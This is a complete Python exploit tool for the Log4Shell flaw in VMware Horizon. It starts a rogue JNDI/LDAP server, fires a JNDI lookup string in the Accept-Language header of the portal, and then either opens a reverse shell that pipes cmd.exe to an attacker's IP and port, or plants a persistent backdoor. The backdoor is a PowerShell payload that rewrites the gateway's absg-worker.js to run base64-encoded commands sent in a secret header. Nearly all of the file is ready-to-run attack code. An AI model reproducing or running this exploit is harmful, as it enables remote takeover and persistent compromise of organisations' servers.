import argparse
import os.path
import random
import secrets
import socket
import string
import subprocess
import sys
import time
from base64 import b64encode
from string import Template
from urllib.parse import urlparse

import requests
# Every request below is sent with verify=False (the Horizon cert is usually
# self-signed); silence the InsecureRequestWarning that would otherwise be
# printed once per request.  Best-effort only: if this requests build does not
# expose the urllib3 shim, the exploit still runs, just with warnings.
try:
    import requests.packages.urllib3 as _urllib3
    _urllib3.disable_warnings()
except Exception:
    pass
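def args():
    """Parse the command line and check the run-time prerequisites.

    Returns ``(url, callback, port, shell, backdoor)`` -- the same 5-tuple the
    module-level dispatch unpacks:

      url      -- target host[:port].  The exploit functions build
                  ``https://{url}/...`` themselves, so a full URL such as
                  ``https://horizon.example.com/`` (which the ``-t`` help text
                  invites) is reduced to its netloc here; a bare host is kept.
      callback -- address the target must connect back to
      port     -- reverse-shell port exactly as given (a string), or None when
                  -p was not supplied
      shell    -- True when -r/--revshell was given
      backdoor -- True when -b/--backdoor was given (wins when both are set)

    Exits with status 1 -- the original used ``exit()``, i.e. status 0, on every
    error path -- when -r is used without -p, the port is not a TCP port
    number, the RogueJndi jar has not been built, or no module was chosen.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("-t", "--url", dest="url", help="VMWare Horizon base URL", action='store', required=True)
    parser.add_argument("-i", "--ip", dest="callback", help="Callback IP for payload delivery.", action='store', required=True)
    parser.add_argument("-p", "--port", dest="port", help="Callback port for reverse shell.", action='store', required=False)
    parser.add_argument("-r", "--revshell", dest="shell", help="Module to establish reverse shell", action='store_true', required=False)
    parser.add_argument("-b", "--backdoor", dest="backdoor", help="Module to add backdoor", action='store_true', required=False)
    opts = parser.parse_args()

    # Accept either "host[:port]" or "scheme://host[:port]/path": urlparse only
    # recognises a netloc after "//", so prefix bare hosts before parsing.
    target = opts.url.strip()
    parsed = urlparse(target if '//' in target else '//' + target)
    if parsed.netloc:
        target = parsed.netloc

    # The reverse-shell module splices the port verbatim into the node.js
    # payload, so insist on a real port number before anything is sent.
    if opts.shell:
        if not opts.port:
            print('[!] You did not specify a port. Re-run command with -p flag.')
            sys.exit(1)
        if not (opts.port.isdigit() and 0 < int(opts.port) <= 65535):
            print(f'[!] Invalid callback port {opts.port!r}; expected a number from 1 to 65535.')
            sys.exit(1)

    # Both modules spawn this jar; fail early instead of after the first request.
    if not os.path.exists('./utils/rogue-jndi/target/RogueJndi-1.1.jar'):
        print('[!] You have not compiled RogueJNDI.')
        print('[!] See README.md for more information.')
        sys.exit(1)

    # Exactly one module runs; -b takes precedence if both flags are present.
    if opts.backdoor:
        print('[*] Implementing backdoor now...')
    elif opts.shell:
        print(f'[*] Make sure an listener is started: ncat -lvnp {opts.port}')
        print('[*] Reverse shell payload executing now.')
    else:
        print('[!] You did not specify a valid module!')
        sys.exit(1)

    return target, opts.callback, opts.port, opts.shell, opts.backdoor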
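def backdoor(url, callback):
    """Plant a persistent command-execution hook in the Blast Secure Gateway.

    Steps, all visible below: start RogueJndi (bounded to 25 s by coreutils
    ``timeout``) serving a PowerShell command, trigger the JNDI lookup through
    the ``Accept-Language`` header of ``/portal/info.jsp``, then poll
    ``https://{url}:8443/verify`` for up to 15 s to see whether the
    ``VMBlastSG`` service is listening again.

    The PowerShell command rewrites ``absg-worker.js`` so that any request whose
    URL contains ``url_path`` runs the base64-decoded value of the request
    header named ``payload_header`` through ``child_process.execSync`` and
    returns its output, then restarts ``VMBlastSG``.  Those two tokens are the
    only thing gating command execution on the gateway, so they come from
    ``secrets`` rather than ``random``.

    Parameters:
      url      -- target host[:port]; used verbatim in ``https://{url}/...``
      callback -- address the target must reach on 1389/tcp for the LDAP
                  lookup; also passed to RogueJndi as ``--hostname``

    Returns None.  Progress, the backdoor path/header and a sample curl line
    are printed.  Note that the success check only proves the gateway answers
    on 8443; a gateway that was never restarted answers 404 just the same.
    """
    endpoint = f'https://{url}/portal/info.jsp'
    # Path and header name double as the backdoor's credentials: CSPRNG, not random().
    url_path = ''.join(secrets.choice(string.ascii_lowercase) for _ in range(25))
    payload_header = ''.join(secrets.choice(string.ascii_lowercase) for _ in range(5))

    # Crafting backdoor
    # If someone can figure out why this doesn't work i'll paypal you $20 USD
    # NOTE(review): PowerShell's -replace takes a regex, so in the variant below
    # "bin\SecurityGateway.exe" is not a literal pattern (\S is a character
    # class and the backslash is consumed); [regex]::Escape() is the likely
    # missing piece -- untested.
    #backdoor = '''$path=gwmi win32_service|?{$_.Name -like "*PCOI*"}|%{$_.PathName -replace '"', '' -replace "bin\SecurityGateway.exe","appblastgateway\lib\\absg-worker.js"};$expr="req.connection.end();`r`n`t`t`t}`r`n`r`n`t`t`tif (String(req.url).includes('URL_PATH')) {`r`n`t`t`t`ttry {`r`n`t`t`t`t`treplyError(req, res, 200, require('child_process').execSync(`r`n`t`t`t`t`t`tBuffer.from(req.headers['HEADER'], 'base64').toString('ascii')`r`n`t`t`t`t`t).toString());`r`n`t`t`t`t}`r`n`t`t`t`tcatch (err) {`r`n`t`t`t`t`treplyError(req, res, 400, err.stderr.toString());`r`n`t`t`t`t}`r`n`t`t`t`treturn;";(Get-Content $path)|ForEach-Object {$_ -replace "req.connection.end\(\)\;", $expr}|Set-Content $path;$nssm=gwmi win32_service|?{$_.Name -like "*PCOI*"}|%{$_.PathName -replace '"', '' -replace "bin\SecurityGateway.exe","appblastgateway\\nssm.exe"};cmd.exe /C $nssm restart VMBlastSG'''
    # Hard-coded install path; 'HEADER' and 'URL_PATH' are the only placeholders.
    ps_script = '''$path="C:\Program Files\VMware\VMware View\Server\\appblastgateway\lib\\absg-worker.js";$expr="req.connection.end();`r`n`t`t`t}`r`n`r`n`t`t`tif (String(req.url).includes('URL_PATH')) {`r`n`t`t`t`ttry {`r`n`t`t`t`t`treplyError(req, res, 200, require('child_process').execSync(`r`n`t`t`t`t`t`tBuffer.from(req.headers['HEADER'], 'base64').toString('ascii')`r`n`t`t`t`t`t).toString());`r`n`t`t`t`t}`r`n`t`t`t`tcatch (err) {`r`n`t`t`t`t`treplyError(req, res, 400, err.stderr.toString());`r`n`t`t`t`t}`r`n`t`t`t`treturn;";(Get-Content $path)|ForEach-Object {$_ -replace "req.connection.end\(\)\;", $expr}|Set-Content $path;Restart-Service -Force VMBlastSG'''
    ps_script = ps_script.replace('HEADER', payload_header).replace('URL_PATH', url_path)
    # powershell -encodedcommand expects base64 of the UTF-16LE script, not UTF-8.
    # https://dariuszparys.github.io/posts/powershell-encodedcommand-from-bash-and-python/
    encoded_string = b64encode(ps_script.encode('utf-16-le')).decode('ascii')

    print('[*] Starting malicous JNDI Server')
    try:
        # coreutils `timeout` (absent on stock macOS) bounds the server to 25 s.
        # Java's output is discarded, so a failure to start is invisible here;
        # the exit status is inspected below if the exploit does not land.
        proc = subprocess.Popen(
            ['timeout', '25s', 'java', '-jar', './utils/rogue-jndi/target/RogueJndi-1.1.jar',
             '--command', f'cmd.exe /c powershell -encodedcommand {encoded_string}',
             '--hostname', callback],
            stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT)
    except FileNotFoundError as exc:
        print(f'[!] Could not start the JNDI server: {exc.filename!r} was not found on PATH.')
        return

    headers = {
        'Accept-Language': f'${{jndi:ldap://{callback}:1389/o=tomcat}}',
        'User-Agent': 'Mozilla/5.0 (VMWare Horizon Exploit Attempt)',
    }
    # Give the JVM time to bind 1389 before the target is told to connect to it.
    time.sleep(5)
    print('[*] Firing payload!\n')
    try:
        # The original had no timeout and raised a bare traceback on any
        # connection problem; bound the wait and report instead.
        requests.get(endpoint, headers=headers, verify=False, timeout=60)
    except requests.RequestException as exc:
        print(f'[!] Could not reach {endpoint}: {exc}')
        return

    print('[*] Checking to see if the VMBlastSG service started.')
    print('[*] This can take up to 15 seconds.')
    if _blast_gateway_listening(url, time.monotonic() + 15):
        print('[*] Exploit successful!')
        print(f'[*] Your backdoors path is: https://{url}:8443/{url_path}')
        print(f'[*] Your backdoors header is: {payload_header}')
        print('[*] Windows commands need to be Base64 encoded and issued in a cURL request similar to the one below:')
        print(f'[*] curl -ski -H "{payload_header}: Y21kLmV4ZSAvYyBjYWxjLmV4ZQo=" https://{url}:8443/{url_path}')
    else:
        print('[!] Exploit failed! VMBlastSG service not successfully started or good firewall rules are in place.')
        print('[!] Good luck next time!')
        # `timeout` exits 124 when it killed java; any other early exit means
        # java itself died (missing JRE, 1389/tcp already bound, ...).
        if proc.poll() is not None and proc.returncode != 124:
            print(f'[!] Note: the JNDI server exited early with status {proc.returncode}; '
                  'is java installed and 1389/tcp free?')


def _blast_gateway_listening(url, deadline):
    """Return True once ``https://{url}:8443/verify`` answers HTTP 404.

    404 is the signal the original code treated as "VMBlastSG is up".  The
    service is being restarted by the payload, so early attempts typically get
    connection refused; those (any ``requests.RequestException``) are retried
    every 2 s until *deadline* (a ``time.monotonic()`` value) instead of
    escaping as an uncaught exception.
    """
    while True:
        try:
            response = requests.get(f'https://{url}:8443/verify', verify=False, timeout=5)
            if response.status_code == 404:
                return True
        except requests.RequestException:
            pass
        if time.monotonic() >= deadline:
            return False
        time.sleep(2)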
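def revshell(url, callback, port):
    """Obtain a reverse shell from the Horizon server via the Log4Shell lookup.

    The command RogueJndi hands to the target runs the gateway's bundled
    ``node.exe`` with an inline script: it spawns ``cmd.exe`` and pipes its
    stdin/stdout/stderr over a TCP connection to ``callback:port``.  A listener
    (e.g. ``ncat -lvnp PORT``) must already be waiting on that address.

    Parameters:
      url      -- target host[:port]; used verbatim in ``https://{url}/...``
      callback -- address the shell connects back to; also the LDAP host the
                  target resolves on 1389/tcp and RogueJndi's ``--hostname``
      port     -- listener port; it is spliced as text into the JS source, so
                  it must be a plain port number

    Returns None.  Whether a shell arrived is only observable at the listener.
    """
    endpoint = f'https://{url}/portal/info.jsp'
    headers = {
        'Accept-Language': f'${{jndi:ldap://{callback}:1389/o=tomcat}}',
        'User-Agent': 'Mozilla/5.0 (VMWare Horizon Exploit Attempt)',
    }
    # Hard-coded install path; 'PORT' and 'IP' are the only placeholders and
    # neither substring occurs anywhere else in the literal.
    node_payload = '''"C:\Program Files\VMware\VMware View\Server\\appblastgateway\\node.exe" -r net -e "sh = require('child_process').exec('cmd.exe');var client = new net.Socket();client.connect(PORT, 'IP', function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});"'''
    command = node_payload.replace('PORT', str(port)).replace('IP', callback)

    print('[*] Starting malicous JNDI Server')
    try:
        # coreutils `timeout` (absent on stock macOS) bounds the server to 25 s;
        # java's output is discarded, so a start-up failure is silent here.
        subprocess.Popen(
            ['timeout', '25s', 'java', '-jar', './utils/rogue-jndi/target/RogueJndi-1.1.jar',
             '--command', command, '--hostname', callback],
            stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT)
    except FileNotFoundError as exc:
        print(f'[!] Could not start the JNDI server: {exc.filename!r} was not found on PATH.')
        return

    # Give the JVM time to bind 1389 before the target is told to connect to it.
    time.sleep(5)
    print('[*] Firing payload!\n')
    try:
        # The original had no timeout and raised a bare traceback on any
        # connection problem; bound the wait and report instead.
        requests.get(endpoint, headers=headers, verify=False, timeout=60)
    except requests.RequestException as exc:
        print(f'[!] Could not reach {endpoint}: {exc}')
        return
    print('[*] Check for a callback!')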
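if __name__ == "__main__":
    # The original unpacked the flags into module names that shadowed the
    # exploit functions (``backdoor`` became a bool) and then called an
    # undefined ``exfil()``, so the -b module could never run.  Keep the flags
    # under distinct names and dispatch to the real functions; the guard keeps
    # an import of this file from firing the exploit.
    target, callback_ip, callback_port, want_shell, want_backdoor = args()
    if want_backdoor:
        backdoor(target, callback_ip)
    elif want_shell:
        revshell(target, callback_ip, callback_port)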